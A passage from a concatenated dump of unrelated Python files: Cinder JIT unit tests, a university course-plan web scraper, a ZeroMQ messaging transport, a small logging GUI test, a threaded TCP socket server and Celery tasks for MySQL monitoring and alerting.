self._delit(d, "foo")
self.assertEqual(d, {"bar": 2})
def test_custom_type(self):
class CustomContainer:
def __init__(self):
self.item = None
def __delitem__(self, item):
self.item = item
c = CustomContainer()
self._delit(c, "foo")
self.assertEqual(c.item, "foo")
def test_missing_key(self):
d = {"foo": 1}
with self.assertRaises(KeyError):
self._delit(d, "bar")
def test_custom_error(self):
class CustomContainer:
def __delitem__(self, item):
raise Exception("testing 123")
c = CustomContainer()
with self.assertRaisesRegex(Exception, "testing 123"):
self._delit(c, "foo")
class DeleteFastTests(unittest.TestCase):
@unittest.failUnlessJITCompiled
def _del(self):
x = 2
del x
@unittest.failUnlessJITCompiled
def _del_arg(self, a):
del a
@unittest.failUnlessJITCompiled
def _del_and_raise(self):
x = 2
del x
return x
@unittest.failUnlessJITCompiled
def _del_arg_and_raise(self, a):
del a
return a
@unittest.failUnlessJITCompiled
def _del_ex_no_raise(self):
try:
return min(1, 2)
except Exception as e:
pass
@unittest.failUnlessJITCompiled
def _del_ex_raise(self):
try:
raise Exception()
except Exception as e:
pass
return e
def test_del_local(self):
self.assertEqual(self._del(), None)
def test_del_arg(self):
self.assertEqual(self._del_arg(42), None)
def test_del_and_raise(self):
with self.assertRaises(NameError):
self._del_and_raise()
def test_del_arg_and_raise(self):
with self.assertRaises(NameError):
self.assertEqual(self._del_arg_and_raise(42), None)
def test_del_ex_no_raise(self):
self.assertEqual(self._del_ex_no_raise(), 1)
def test_del_ex_raise(self):
with self.assertRaises(NameError):
self.assertEqual(self._del_ex_raise(), 42)
class KeywordOnlyArgTests(unittest.TestCase):
@unittest.failUnlessJITCompiled
def f1(self, *, val=10):
return val
@unittest.failUnlessJITCompiled
def f2(self, which, *, y=10, z=20):
if which == 0:
return y
elif which == 1:
return z
return which
@unittest.failUnlessJITCompiled
def f3(self, which, *, y, z=20):
if which == 0:
return y
elif which == 1:
return z
return which
@unittest.failUnlessJITCompiled
def f4(self, which, *, y, z=20, **kwargs):
if which == 0:
return y
elif which == 1:
return z
elif which == 2:
return kwargs
return which
def test_kwonly_arg_passed_as_positional(self):
msg = "takes 1 positional argument but 2 were given"
with self.assertRaisesRegex(TypeError, msg):
self.f1(100)
msg = "takes 2 positional arguments but 3 were given"
with self.assertRaisesRegex(TypeError, msg):
self.f3(0, 1)
def test_kwonly_args_with_kwdefaults(self):
self.assertEqual(self.f1(), 10)
self.assertEqual(self.f1(val=20), 20)
self.assertEqual(self.f2(0), 10)
self.assertEqual(self.f2(0, y=20), 20)
self.assertEqual(self.f2(1), 20)
self.assertEqual(self.f2(1, z=30), 30)
def test_kwonly_args_without_kwdefaults(self):
self.assertEqual(self.f3(0, y=10), 10)
self.assertEqual(self.f3(1, y=10), 20)
self.assertEqual(self.f3(1, y=10, z=30), 30)
def test_kwonly_args_and_varkwargs(self):
self.assertEqual(self.f4(0, y=10), 10)
self.assertEqual(self.f4(1, y=10), 20)
self.assertEqual(self.f4(1, y=10, z=30, a=40), 30)
self.assertEqual(self.f4(2, y=10, z=30, a=40, b=50), {"a": 40, "b": 50})
class ClassA:
z = 100
x = 41
def g(self, a):
return 42 + a
@classmethod
def cls_g(cls, a):
return 100 + a
class ClassB(ClassA):
def f(self, a):
return super().g(a=a)
def f_2arg(self, a):
return super(ClassB, self).g(a=a)
@classmethod
def cls_f(cls, a):
return super().cls_g(a=a)
@classmethod
def cls_f_2arg(cls, a):
return super(ClassB, cls).cls_g(a=a)
@property
def x(self):
return super().x + 1
@property
def x_2arg(self):
return super(ClassB, self).x + 1
class SuperAccessTest(unittest.TestCase):
@unittest.failUnlessJITCompiled
def test_super_method(self):
self.assertEqual(ClassB().f(1), 43)
self.assertEqual(ClassB().f_2arg(1), 43)
self.assertEqual(ClassB.cls_f(99), 199)
self.assertEqual(ClassB.cls_f_2arg(99), 199)
@unittest.failUnlessJITCompiled
def test_super_method_kwarg(self):
self.assertEqual(ClassB().f(1), 43)
self.assertEqual(ClassB().f_2arg(1), 43)
self.assertEqual(ClassB.cls_f(1), 101)
self.assertEqual(ClassB.cls_f_2arg(1), 101)
@unittest.failUnlessJITCompiled
def test_super_attr(self):
self.assertEqual(ClassB().x, 42)
self.assertEqual(ClassB().x_2arg, 42)
class RegressionTests(StaticTestBase):
# Detects an issue in the backend where the Store instruction generated 32-
# bit memory writes for 64-bit constants.
def test_store_of_64bit_immediates(self):
codestr = f"""
from __static__ import int64, box
class Cint64:
def __init__(self):
self.a: int64 = 0x5555555555555555
def testfunc():
c = Cint64()
c.a = 2
return box(c.a) == 2
"""
with self.in_module(codestr) as mod:
testfunc = mod["testfunc"]
self.assertTrue(testfunc())
if cinderjit:
self.assertTrue(cinderjit.is_jit_compiled(testfunc))
@unittest.skipUnlessCinderJITEnabled("Requires cinderjit module")
class CinderJitModuleTests(unittest.TestCase):
def test_bad_disable(self):
with self.assertRaises(TypeError):
cinderjit.disable(1, 2)
with self.assertRaises(TypeError):
cinderjit.disable(None)
def test_jit_force_normal_frame_changes_flags(self):
def x():
pass
CO_NORMAL_FRAME = 0x20000000
self.assertEqual(x.__code__.co_flags & CO_NORMAL_FRAME, 0)
forced_x = cinderjit.jit_force_normal_frame(x)
self.assertEqual(x.__code__.co_flags & CO_NORMAL_FRAME, CO_NORMAL_FRAME)
def test_jit_force_normal_frame_raises_on_invalid_arg(self):
with self.assertRaises(TypeError):
cinderjit.jit_force_normal_frame(None)
if __name__ == "__main__":
unittest.main()
|
course_plan_scraper.py
|
from math import ceil
from scraper import Scraper
from selenium.webdriver.common.by import By
from selenium.webdriver.common.action_chains import ActionChains
import threading
from driver_manager import DriverManager
from time import perf_counter
from rich import print as rprint
import requests
from bs4 import BeautifulSoup
from urllib3.exceptions import NewConnectionError
class CoursePlanScraper(Scraper):
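    """Scrapes course plans from the ITU SIS site, faculty by faculty, using a small
    pool of WebDriver threads."""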
MAX_FACULTY_THREADS = 4
def generate_dropdown_options_faculty(self, driver):
# Check if the dropdown is already expanded.
dropdown = driver.find_elements(By.TAG_NAME, "button")[0]
if dropdown.get_attribute("aria-expanded") == "true":
return
# Clicking this generates dropdown options.
driver.find_elements(
By.CLASS_NAME, "filter-option-inner-inner")[0].click()
self.wait()
def generate_dropdown_options_program(self, driver):
# Check if the dropdown is already expanded.
dropdown = driver.find_elements(By.TAG_NAME, "button")[1]
if dropdown.get_attribute("aria-expanded") == "true":
return
# Clicking this generates dropdown options.
driver.find_elements(
By.CLASS_NAME, "filter-option-inner-inner")[1].click()
self.wait()
def get_submit_button(self):
return self.find_elements_by_class("button")[0]
def scrape_program(self, url):
soup = self.get_soup_from_url(url)
program_list = []
tables = soup.find_all("table", {"class": "table-responsive"})
for table in tables:
semester_program = []
# First row is just the header.
rows = table.find_all("tr")[1:]
for row in rows:
cells = row.find_all("td")
# If the course is selective.
a = cells[1].find("a")
if a is not None:
selective_courses_url = url.replace(
url.split("/")[-1], a["href"])
selective_courses_title = a.get_text()
selective_soup = self.get_soup_from_url(
selective_courses_url)
selective_courses = []
selective_course_table = selective_soup.find(
"table", {"class": "table-responsive"})
if selective_course_table is not None:
selective_course_rows = selective_course_table.find_all(
"tr")
# First row is just the header.
for selective_row in selective_course_rows[1:]:
selective_courses.append(
selective_row.find("a").get_text())
semester_program.append(
{selective_courses_title: selective_courses})
else:
# TODO: Add support for selective courses like this:
# https://www.sis.itu.edu.tr/TR/ogrenci/lisans/ders-planlari/plan/MAK/20031081.html
semester_program.append(
{selective_courses_title: []})
else:
course_code = cells[0].find("a").get_text()
semester_program.append(course_code)
program_list.append(semester_program)
return program_list
def get_soup_from_url(self, url):
try:
page = requests.get(url)
soup = BeautifulSoup(page.content, "html.parser")
return soup
except NewConnectionError:
rprint(f"[bold red]Failed to load the url {url}, trying again...")
self.wait()
return self.get_soup_from_url(url)
def scrap_programs(self, program_name, url):
program_iterations = dict()
soup = self.get_soup_from_url(url)
# Cache the urls for the program iterations.
for a in soup.find_all("a"):
iteration_url = a["href"]
inner_part = a.get_text()
if ".html" in iteration_url:
program_iterations[inner_part] = url + iteration_url
def scrap_program_and_save(key, url):
try:
program_iterations[key] = self.scrape_program(url)
except Exception as e:
rprint(
f"[bold red]The following error was thrown while scraping a program iteration of [cyan]\"{program_name}\"[bold red]:\n\n{e}")
self.wait()
scrap_program_and_save(key, url)
for program_iteration, url in program_iterations.items():
scrap_program_and_save(program_iteration, url)
return program_iterations
def scrap_course_plan(self, i, url):
driver = DriverManager.create_driver()
driver.get(url)
def get_faculty_dropdown_options():
self.generate_dropdown_options_faculty(driver)
return driver.find_elements(By.TAG_NAME, "li")[69:]
faculty_dropdown_option = get_faculty_dropdown_options()[i]
faculty = self.get_dropdown_option_if_available(
faculty_dropdown_option)
if faculty is None:
driver.quit()
return
faculty_name = faculty_dropdown_option.find_element(
By.TAG_NAME, "span").get_attribute("innerHTML")
ActionChains(driver).move_to_element(
faculty).click(faculty).perform()
def get_program_dropdown_options():
self.generate_dropdown_options_program(driver)
return driver.find_elements(By.TAG_NAME, "li")
faculty_plans = dict()
for j in range(len(get_program_dropdown_options())):
program_dropdown_option = get_program_dropdown_options()[j]
program = self.get_dropdown_option_if_available(
program_dropdown_option)
if program is None:
continue
program_name = program_dropdown_option.find_element(
By.TAG_NAME, "span").get_attribute("innerHTML")
ActionChains(driver).move_to_element(
program).click(program).perform()
driver.find_elements(By.CLASS_NAME, "button")[0].click()
self.wait()
faculty_plans[program_name] = self.scrap_programs(
program_name, driver.current_url)
rprint(
f"[white]Finished Scraping The Program: [cyan]\"{program_name}\"[white] Under the Faculty: [bold red]\"{faculty_name}\"")
driver.back()
driver.quit()
rprint(
f"[white]Finished Scraping The Faculty: [bold red]\"{faculty_name}\"")
self.faculties[faculty_name] = faculty_plans
def scrap_course_plans(self):
def get_faculty_dropdown_options():
self.generate_dropdown_options_faculty(self.webdriver)
return self.find_elements_by_tag("li")[69:85]
faculty_order = [x.find_element(By.TAG_NAME, "span").get_attribute("innerHTML")
for x in get_faculty_dropdown_options()]
t0 = perf_counter()
self.faculties = dict()
print("====== Scraping Course Programs ======")
faculty_count = len(get_faculty_dropdown_options())
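        # Scrape faculties in batches of MAX_FACULTY_THREADS; each batch is started
        # and joined before the next one begins.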
for j in range(ceil(faculty_count / self.MAX_FACULTY_THREADS)):
rprint(f"[bold green]Refreshed:[green] Faculty Threads")
threads = []
for i in range(self.MAX_FACULTY_THREADS):
current_index = i + j * self.MAX_FACULTY_THREADS
if current_index >= faculty_count:
break
threads.append(threading.Thread(
target=self.scrap_course_plan, args=(current_index, self.webdriver.current_url)))
for t in threads:
t.start()
for t in threads:
t.join()
rprint(
f"[bold green]Threads Finished:[green] Thread {0 + j * self.MAX_FACULTY_THREADS} - {(j + 1) * self.MAX_FACULTY_THREADS}")
t1 = perf_counter()
rprint(
f"Scraping Course Plans Completed in [green]{round(t1 - t0, 2)}[white] seconds.")
return self.faculties, faculty_order
|
transport.py
|
from threading import Thread, Lock, Event
from zlib import compress, decompress
import time
import zmq
from google import protobuf
from .engine_commons import getUUID, getOpenPort, baseToPubSubPort
from .message_pb2 import SocketMessage
#################
### CONSTANTS ###
#################
from .constants import DELIMITER, ACK
CONN_REQUEST = b'portplease'
BASE_PORT = 8484
################################################################
#######################
### TRANSPORT CLASS ###
#######################
# pylint: disable=too-many-instance-attributes, fixme
class Transport:
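    """ZeroMQ-based message transport.

    Direct (one-to-one) messages travel over PAIR sockets negotiated via a ROUTER
    socket bound to `pairRoutingPort`; broadcast messages use a PUB/SUB pair on
    `pubsubPort`. Payloads are protobuf `SocketMessage`s, optionally zlib-compressed.
    `DIRECT` and `SUBSCRIBER` (or a list of both) select what `connect()` sets up.
    """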
# pylint: disable=invalid-name
DIRECT = 1
SUBSCRIBER = 2
BOTH = 3
# pylint: disable=bad-continuation
def __init__(
self,
context=zmq.Context(),
# router=None,
timeout=10, # milliseconds
compression=False,
requireAcknowledgement=True,
basePort=BASE_PORT,
):
self.context = context
# self.router = router # TODO: Add plugin capability
self.timeout = timeout
self.useCompression = compression
self.requireAcknowledgement = requireAcknowledgement
self.pairRoutingPort = basePort
self.pubsubPort = baseToPubSubPort(basePort)
self._topics = {}
self._callbacks = {}
self._topicEvents = {}
self._awaitingAcknowledgement = {}
self.parseLock = Lock()
self._directConnectionsLock = Lock()
self._closeEvent = Event()
self._directConnections = {}
self._routingSocket = None
self._subscriber = None
self._publisher = None
self._pairHost = None
self.stopped = False
self.started = False
########################
### HELPER FUNCTIONS ###
########################
def _generateBoundSocket(self, socketType, port):
socket = self.context.socket(socketType)
socket.RCVTIMEO = self.timeout # in milliseconds
socket.bind('tcp://*:{}'.format(port))
return socket
def _generateConnectSocket(self, socketType, address, port):
socket = self.context.socket(socketType)
socket.RCVTIMEO = self.timeout # in milliseconds
socket.connect('tcp://{}:{}'.format(address, port))
return socket
def _ensurePublisher(self):
if self._publisher is not None:
return
# pylint: disable=no-member
self._publisher = self._generateBoundSocket(zmq.PUB, self.pubsubPort)
def _ensureSubscriber(self):
if self._subscriber is not None:
return
# pylint: disable=no-member
self._subscriber = self.context.socket(zmq.SUB)
self._subscriber.RCVTIMEO = self.timeout # in milliseconds
def _connectSubscriber(self, address, port):
# If the user specifies an override port, use that; otherwise use default
port = port or self.pubsubPort
self._subscriber.connect('tcp://{}:{}'.format(address, port))
# Returns serialized string message
def _createSocketMessage(self, topic, data, acknowledgement=False):
message = SocketMessage()
message.type = topic
message.data = data
if acknowledgement:
message.acknowledge = True
self._awaitingAcknowledgement[topic] = Event()
serialized = message.SerializeToString()
if self.useCompression:
serialized = compress(serialized)
return serialized
##########################
### CONNECTION HELPERS ###
##########################
def _directConnect(self, address, targetBasePort):
        # Fall back to our own routing port when the caller does not specify one.
        if targetBasePort is None:
            targetBasePort = self.pairRoutingPort
socket = self._requestNewConnection(address, targetBasePort)
uuid = getUUID()
self._directConnections[uuid] = socket
return uuid
# pylint: disable=no-member
def _requestNewConnection(self, address, port):
socket = self._generateConnectSocket(zmq.REQ, address, port)
socket.send(CONN_REQUEST)
# TODO: Better define this behavior
while True:
try:
port = socket.recv().decode()
break
except zmq.error.Again:
continue
socket.close()
return self._generateConnectSocket(zmq.PAIR, address, port)
def _handleConnectionRequests(self, address, request):
if request != CONN_REQUEST:
raise RuntimeError('Received a connection request without appropriate metadata')
openPort = getOpenPort()
self._directConnections[getUUID()] = self._generateBoundSocket(zmq.PAIR, openPort)
self._routingSocket.send_multipart(
[address, b'', '{}'.format(openPort).encode(),]
)
#####################
### MAIN RUN LOOP ###
#####################
def _run(self):
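        # Poll three sources in turn: connection requests on the ROUTER socket, every
        # direct PAIR connection, and the SUB socket (if any). All receives time out
        # after `self.timeout` milliseconds, so the loop never blocks for long.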
while True:
if self.stopped:
self._close()
return
try:
address, _, request = self._routingSocket.recv_multipart()
self._handleConnectionRequests(address, request)
except zmq.error.Again:
pass
for socket in list(self._directConnections.values()):
try:
message = socket.recv()
self._handleMessage(message, socket)
except zmq.error.Again:
pass
if self._subscriber:
try:
message = self._subscriber.recv()
self._handleSubscriptionMessage(message)
except zmq.error.Again:
pass
# pylint: disable=no-member
def _handleMessage(self, rawMessage, socket=None):
message = SocketMessage()
try:
message.ParseFromString(rawMessage)
except protobuf.message.DecodeError:
message.ParseFromString(decompress(rawMessage))
# TODO: Implement metadata cascade
# self._metadataCascade(message)
# Parse message topic (type)
if message.data != '':
if message.data == ACK:
if self._awaitingAcknowledgement.get(message.type, False):
self._awaitingAcknowledgement[message.type].set()
return
self._topics[message.type] = message.data
# Fire any registered callbacks
if self._callbacks.get(message.type, False):
self._callbacks[message.type](self, message.type, message.data)
# Resolve any waiting events
if self._topicEvents.get(message.type, False):
self._topicEvents[message.type].set()
# Send an acknowledgement if required
# pylint: disable=singleton-comparison
if message.acknowledge == True:
self._sendAcknowledgement(socket, message.type)
def _handleSubscriptionMessage(self, rawMessage):
# TODO: Validate this approach
self._handleMessage(rawMessage.split(DELIMITER)[1])
def _sendMessage(self, message, routingID=None):
if routingID is None:
for socket in list(self._directConnections.values()):
                # TODO: This is not good, but makes things work. Investigate better methods.
time.sleep(0.005)
socket.send(message)
return
        socket = self._directConnections.get(routingID)
if socket is None:
raise RuntimeError('Unable to send message to route ID; connection does not exist')
socket.send(message)
def _sendAcknowledgement(self, socket, topic):
socket.send(self._createSocketMessage(topic, ACK))
def _close(self):
self.started = False
for socket in list(self._directConnections.values()):
socket.close()
if self._publisher is not None:
self._publisher.close()
if self._subscriber is not None:
self._subscriber.close()
self._closeEvent.set()
######################
### CORE INTERFACE ###
######################
def start(self):
# Setup routing socket
        # This will sometimes fail with `zmq.error.ZMQError: Permission denied`
        # TODO: Add resilience to this
self._routingSocket = self._generateBoundSocket(zmq.ROUTER, self.pairRoutingPort)
# Start thread
Thread(target=self._run, args=()).start()
self.started = True
return self
def connect(self, address, targetBasePort=None, connectionTypes=1):
if not isinstance(connectionTypes, list):
connectionTypes = [connectionTypes]
uuid = None
if Transport.DIRECT in connectionTypes:
uuid = self._directConnect(address, targetBasePort)
if Transport.SUBSCRIBER in connectionTypes:
self._ensureSubscriber()
self._connectSubscriber(address, targetBasePort)
return uuid
def publish(self, topic, data):
# Ensure publisher exists, then push messages
self._ensurePublisher()
message = self._createSocketMessage(topic, data)
self._publisher.send(topic.encode() + DELIMITER + message)
def subscribe(self, topic):
# Ensure a subscriber exists and subscribe
self._ensureSubscriber()
self._subscriber.subscribe(topic)
def send(self, topic, data, routingID=None):
self._sendMessage(
self._createSocketMessage(topic, data, self.requireAcknowledgement), routingID
)
if self.requireAcknowledgement:
self._awaitingAcknowledgement[topic].wait()
def get(self, topic):
return self._topics.get(topic, None)
def registerCallback(self, topic, function):
self._callbacks[topic] = function
def close(self):
self.stopped = True
self._closeEvent.wait()
#########################
### INTERFACE HELPERS ###
#########################
def waitForMessageOnTopic(self, topic):
if self.get(topic) is not None:
return
self.waitForNewMessageOnTopic(topic)
def waitForNewMessageOnTopic(self, topic):
event = Event()
self._topicEvents[topic] = event
event.wait()
self._topicEvents[topic] = None
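# A minimal usage sketch, kept as a comment. `Messenger` is a hypothetical stand-in for
# this class's actual name, and the two instances are assumed to be configured with
# distinct routing/pubsub ports via constructor arguments not shown here:
#
#   node_a = Messenger().start()
#   node_b = Messenger().start()
#   # Open a direct PAIR connection to node_a and also attach a subscriber to its publisher
#   route_id = node_b.connect('127.0.0.1', connectionTypes=[Transport.DIRECT, Transport.SUBSCRIBER])
#   node_b.subscribe('status')
#   node_b.registerCallback('status', lambda node, topic, data: print(topic, data))
#   node_a.publish('status', 'ready')        # fan-out over the PUB/SUB sockets
#   node_b.send('ping', 'hello', route_id)   # point-to-point over the PAIR socket
#   node_b.waitForMessageOnTopic('status')
#   node_a.close(); node_b.close()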
|
test_balsa_gui.py
|
import time
import threading
import pyautogui
from balsa import get_logger, Balsa, __author__
from test_balsa import enter_press_time
def press_enter():
time.sleep(enter_press_time)
pyautogui.press("enter")
def test_balsa_gui():
application_name = "test_balsa_gui"
balsa = Balsa(application_name, __author__, verbose=True, log_directory="temp", gui=True, is_root=False, delete_existing_log_files=True)
balsa.init_logger()
log = get_logger(application_name)
press_enter_thread = threading.Thread(target=press_enter)
press_enter_thread.start()
log.error("test error message")
press_enter_thread.join()
if __name__ == "__main__":
test_balsa_gui()
|
server.py
|
# -*- coding: utf-8 -*-
# @Author: TD21forever
# @Date: 2019-11-24 01:12:39
# @Last Modified by: TD21forever
# @Last Modified time: 2019-11-24 15:40:39
from socket import *
import threading
def stoc(client_socket, addr):
while True:
try:
client_socket.settimeout(500)
            buf = client_socket.recv(1024)
            if not buf:
                # client closed the connection; stop this handler thread
                break
            print("*" * 10)
            print("msg from:", addr[1])
            print("msg:", buf.decode('utf-8'))
            print("*" * 10)
        except timeout:
            # `timeout` is the socket timeout exception provided by `from socket import *`
            print("Time Out")
            break
#""表示localhost
myHost = ""
myPort = 50007
# 设置一个TCP socket对象
server = socket(AF_INET, SOCK_STREAM)
# 绑定端口号
server.bind((myHost, myPort))
# 监听,允许5个连结
server.listen(5)
while True:
# 等待客户端连接
client, address = server.accept()
print("Server conneted by", address)
thread = threading.Thread(target=stoc, args=(client, address))
thread.start()
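# A minimal client sketch for exercising this server, kept as a comment; run it as a
# separate script. The host/port values simply mirror the defaults above:
#
#   from socket import socket, AF_INET, SOCK_STREAM
#   client = socket(AF_INET, SOCK_STREAM)
#   client.connect(("127.0.0.1", 50007))
#   client.send("hello server".encode("utf-8"))
#   client.close()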
|
mon.py
|
# -*- coding: utf-8 -*-
from celery import shared_task
import time,string
from django.template import loader
from dbmanage.myapp.models import MySQL_monitor
from dbmanage.myapp.models import Db_instance,Db_account
import MySQLdb,datetime
from dbmanage.myapp.include.encrypt import prpcrypt
from dbmanage.myapp.tasks import sendmail
from dbmanage.monitor.models import Mysql_processlist,Mysql_replication,MysqlStatus,Alarm,AlarmTemp
from dbmanage.myapp.include.scheduled import mysql_exec
from django.utils import timezone
from dbmanage.bkrs.models import BackupLog,count_day_status,count_mon_status,backfailed,BackupHostConf
import threading
import calendar
class Connect(object):
def __init__(self,ip=None,port=None,user=None,passwd=None):
self.ip = ip
self.port = int(port)
self.user = user
self.passwd = passwd
def query_mysql(self,sql):
try:
conn=MySQLdb.connect(host=self.ip,user=self.user,passwd=self.passwd,port=self.port,connect_timeout=5,charset='utf8')
conn.select_db('information_schema')
cursor = conn.cursor()
count=cursor.execute(sql)
index=cursor.description
col=[]
#get column name
for i in index:
col.append(i[0])
result=cursor.fetchall()
cursor.close()
conn.close()
return (result,col)
except Exception,e:
return([str(e)],''),['error']
def kill_id(self,idlist):
try:
conn=MySQLdb.connect(host=self.ip,user=self.user,passwd=self.passwd,port=self.port,connect_timeout=5,charset='utf8')
conn.select_db('information_schema')
curs = conn.cursor()
for i in idlist:
try:
curs.execute(i)
except Exception, e:
pass
conn.commit()
curs.close()
conn.close()
results = 'success'
except Exception, e:
results = 'error'
return results
# active sql,long sql,slave stop,slave delay,connections
alarm_list = {
1:'active sql',
2:'long sql',
3:'long sql killed',
4:'slave stop',
5:'slave delay',
6:'connections',
7:'server down'
}
# @task
# def sendmail_monitor(title,mailto,data,alarm_type):
# if alarm_type in ['active sql','long sql'] and data!='ok':
# mon_sqllist = data
# elif data == 'ok':
# alarm_information = alarm_type+' ok'
# else:
# alarm_information = data
# # print alarm_information
# html_content = loader.render_to_string('include/mail_template.html', locals())
# sendmail(title, mailto, html_content)
@shared_task()
def backup_statistics():
try:
        # Assume 5 backup files per platform per day counts as a successful backup
everyday_back_file = 0
#count_day_status
back_file_success = 0
back_customers_success = 0
back_file_failed = 0
back_customers_failed = 0
#count_mon_status
back_customers_mon = 0
back_customers_stop_mon = 0
back_file_cur_mon = 0
def getMonthFirstDayAndLastDay(year=None, month=None):
"""
:param year: 年份,默认是本年,可传int或str类型
:param month: 月份,默认是本月,可传int或str类型
:return: firstDay: 当月的第一天,datetime.date类型
lastDay: 当月的最后一天,datetime.date类型
"""
if year:
year = int(year)
else:
year = datetime.date.today().year
if month:
month = int(month)
else:
month = datetime.date.today().month
            # Get the weekday of the month's first day and the total number of days in the month
firstDayWeekDay, monthRange = calendar.monthrange(year, month)
            # Get the first and the last day of the month
firstDay = datetime.date(year=year, month=month, day=1)
lastDay = datetime.date(year=year, month=month, day=monthRange)
return firstDay, lastDay
firstday,lastday = getMonthFirstDayAndLastDay(datetime.datetime.today().year,datetime.datetime.today().month)
cur_mon = str(time.strftime('%Y-%m',time.localtime(time.time())))
yesterday = str(datetime.date.today()-datetime.timedelta(days=1))
today = str(datetime.date.today()-datetime.timedelta(days=0))
back_file_success = BackupLog.objects.filter(start_date__gte=yesterday,start_date__lte=today).count()
back_file_failed = backfailed.objects.filter(start_date__gte=yesterday,start_date__lte=today).count()
back_customers_failed = backfailed.objects.all().values('host').distinct().count()
        back_customers_all = BackupLog.objects.all().values('host').distinct().count()
        back_customers_success = back_customers_all - back_customers_failed
count_day_status.objects.create(count_date=yesterday,
back_file_success=back_file_success,
back_customers_success=back_customers_success,
back_file_failed=back_file_failed,
back_customers_failed=back_customers_failed)
back_customers_mon = BackupHostConf.objects.filter(status=0).count()
back_customers_stop_mon = BackupHostConf.objects.filter(status=1).count()
        back_file_cur_mon = BackupLog.objects.filter(start_date__gte=firstday, start_date__lte=lastday).count()
# db.query("select count(*) from backarchives where DATE_FORMAT(back_time,'%%Y-%%m')='%s'" %cur_mon)[0][0]
#
# cur_mon_count = db.query("select id from count_mon_status where count_date='%s'" %cur_mon)
# if cur_mon_count:
# cur_mon_id = cur_mon_count[0][0]
# sql = "update count_mon_status set back_customers=%s,back_customers_stop=%s,back_file=%s where id=%s" %(back_customers_mon,back_customers_stop_mon,back_file_cur_mon,cur_mon_id)
# #print sql
# db.update(sql)
# else:
# sql = "insert into count_mon_status(count_date,back_customers,back_customers_stop,back_file) " \
# "values('%s',%s,%s,%s)" %(cur_mon,back_customers_mon,back_customers_stop_mon,back_file_cur_mon)
# #print sql
# db.update(sql)
#
# db.close()
except:
pass
@shared_task()
def sendmail_monitor(instance_id,mailto,data,alarm_type):
instance = Db_instance.objects.get(id=instance_id)
dbinfo = 'IP: '+instance.ip + '\n' + 'PORT: ' + instance.port + '\n'
title = ''
if data=='ok':
alarm_information = alarm_list[alarm_type] + ' ok'
title = instance.ip+':'+instance.port+'['+instance.comments+']'+'---------'+alarm_information
elif alarm_type in [1,2,3]:
title = instance.ip+':'+instance.port+'['+instance.comments+']'+'---------'+ alarm_list[alarm_type]
mon_sqllist = data
elif alarm_type == 6:
title = instance.ip+':'+instance.port+'['+instance.comments+']'+'---------'+ 'too many connections'
alarm_information = 'values: '+ str(data)
elif alarm_type == 5:
title = instance.ip+':'+instance.port+'['+instance.comments+']'+'---------'+ alarm_list[alarm_type]
alarm_information = 'values: '+ str(data)
elif alarm_type == 4:
alarm_information = 'SLAVE_IO_THREAD:'+ data['iothread'] + '\nSLAVE_SQL_THREAD:' + data['sqlthread'] + '\n'
title = instance.ip+':'+instance.port+'['+instance.comments+']'+'---------'+ alarm_list[alarm_type]
elif alarm_type == 7:
title = instance.ip+':'+instance.port+'['+instance.comments+']'+'---------'+ alarm_list[alarm_type]
alarm_information = "MySQL Server Down"
html_content = loader.render_to_string('include/mail_template.html', locals())
sendmail(title, mailto, html_content)
@shared_task()
def mon_mysql():
monlist = MySQL_monitor.objects.filter(monitor=1)
no_monlist = MySQL_monitor.objects.filter(monitor=0)
if len(no_monlist)>0:
for i in no_monlist:
Mysql_replication.objects.filter(db_ip=i.instance.ip).filter(db_port=i.instance.port).delete()
MysqlStatus.objects.filter(db_ip=i.instance.ip).filter(db_port=i.instance.port).delete()
# plist=[]
if len(monlist)>0:
for i in monlist:
# check_mysql.apply_async((i,),queue='mysql_monitor',routing_key='monitor.mysql')
# check_mysql_host.delay(i.instance_id,i.account_id)
t = threading.Thread(target=check_mysql_host,args=(i.instance_id,i.account_id,))
t.start()
print i.tag,datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')
@shared_task()
def test(x,y):
return x*y
@shared_task
def check_mysql_host(instance_id,account_id):
instance = Db_instance.objects.get(id=instance_id)
db_account = Db_account.objects.get(id=account_id)
mon_basic(instance,db_account)
# longlist = []
py = prpcrypt()
#
conn_info = Connect(instance.ip,instance.port,db_account.user,py.decrypt(db_account.passwd))
result,col = conn_info.query_mysql("select ID,USER,HOST,DB,COMMAND,TIME,STATE,INFO from information_schema.processlist where COMMAND !='Sleep' and DB not in ('information_schema','sys') and user not in ('system user','event_scheduler') and command!='Binlog Dump' and info like 'select%'")
# result,col = conn_info.query_mysql("select ID,USER,HOST,DB,COMMAND,TIME,STATE,INFO from processlist")
mysql_monitor = MySQL_monitor.objects.get(instance_id=instance.id)
if mysql_monitor.check_longsql == 1:
try:
longsql_send = filter(lambda x:int(x[5])>int(mysql_monitor.longsql_time),result)
except Exception,e:
longsql_send=''
# print longsql_send
alarm_type = 2
if len(longsql_send)>0:
flag = record_alarm(mysql_monitor, alarm_type)
if mysql_monitor.longsql_autokill == 1:
idlist = map(lambda x:'kill '+str(x[0])+';',longsql_send)
conn_info.kill_id(idlist)
sendmail_monitor.delay(instance.id,mysql_monitor.mail_to.split(';'), longsql_send,3)
elif flag:
sendmail_monitor.delay(instance.id,mysql_monitor.mail_to.split(';'),longsql_send,alarm_type)
else:
check_ifok(instance, alarm_type)
if mysql_monitor.check_active == 1 :
alarm_type = 1
if len(result)>=int(mysql_monitor.active_threshold) :
if record_alarm(mysql_monitor, alarm_type):
sendmail_monitor.delay(instance.id, mysql_monitor.mail_to.split(';'), result,alarm_type)
else:
check_ifok(instance, alarm_type)
insertlist=[]
# for i in result:
# insertlist.append(Mysql_processlist(conn_id=i[0],user=i[1],host=i[2],db=i[3],\
# command=i[4],time=i[5],state=i[6],info=i[7]))
if len(result)>0 and type(result[0][0]) == int :
try:
insertlist = map(lambda x:Mysql_processlist(db_ip=instance.ip,db_port=instance.port,
conn_id=x[0],user=x[1],host=x[2],db=x[3],
command=x[4],time=x[5],state=x[6],info=x[7]),result)
# print insertlist
Mysql_processlist.objects.bulk_create(insertlist)
except Exception,e:
print e
def record_alarm(mysql_monitor,num):
instance = Db_instance.objects.get(id=mysql_monitor.instance_id)
alarm_type = alarm_list[num]
time = timezone.now()-datetime.timedelta(minutes=mysql_monitor.alarm_interval)
if len(AlarmTemp.objects.filter(db_ip=instance.ip, db_port=instance.port,alarm_type=alarm_type,create_time__gte=time))< int(mysql_monitor.alarm_times) + 2:
new_alarm = Alarm(send_mail=1,db_ip=instance.ip, db_port=instance.port, alarm_type=alarm_type)
new_alarm.save()
new_alarm1 = AlarmTemp(db_ip=instance.ip, db_port=instance.port, alarm_type=alarm_type)
new_alarm1.save()
